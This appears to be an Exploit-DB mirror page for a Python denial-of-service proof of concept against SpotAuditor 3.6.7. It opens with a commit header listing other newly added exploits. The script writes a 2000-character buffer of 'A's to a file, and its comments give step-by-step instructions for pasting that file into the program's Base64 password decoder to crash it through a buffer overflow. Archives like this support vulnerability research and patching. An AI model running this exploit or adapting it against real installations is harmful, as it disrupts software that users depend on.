exploit-db-mirror/exploits/windows/dos/46313.py
Offensive Security 298b95e694 DB: 2019-02-05
10 changes to exploits/shellcodes

MyVideoConverter Pro 3.14 - Denial of Service
River Past Ringtone Converter 2.7.6.1601 - Denial of Service (PoC)
SpotAuditor 3.6.7 - Denial of Service (PoC)
TaskInfo 8.2.0.280 - Denial of Service (PoC)
Tiki Wiki 15.1 - File Upload
ResourceSpace 8.6 - 'watched_searches.php' SQL Injection
SuiteCRM 7.10.7 - 'parentTab' SQL Injection
SuiteCRM 7.10.7 - 'record' SQL Injection
Nessus 8.2.1 - Cross-Site Scripting
pfSense 2.4.4-p1 - Cross-Site Scripting
2019-02-05 05:01:41 +00:00

23 lines
No EOL
800 B
Python
Executable file

# Exploit Title: SpotAuditor v3.6.7 - Denial of Service (PoC)
# Discovery by: Rafael Pedrero
# Discovery Date: 2019-01-30
# Vendor Homepage: http://www.nsauditor.com/order.html
# Software Link : http://www.nsauditor.com/order.html
# Tested Version: v3.6.7
# Tested on: Windows XP SP3
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
# Steps to Produce the Crash:
# 1.- Run SpotAuditor.exe
# 2.- copy content SpotAuditor_Crash.txt to clipboard (result from this python script)
# 3.- Go to "Tools" - "Base64 Password Decoder" and paste the result in the "Base64 Encrypted Password:" textbox.
# 4.- Click in Decrypt button and you will see a crash.
#!/usr/bin/env python
crash = "\x41" * 2000
f = open ("SpotAuditor_Crash.txt", "w")
f.write(crash)
f.close()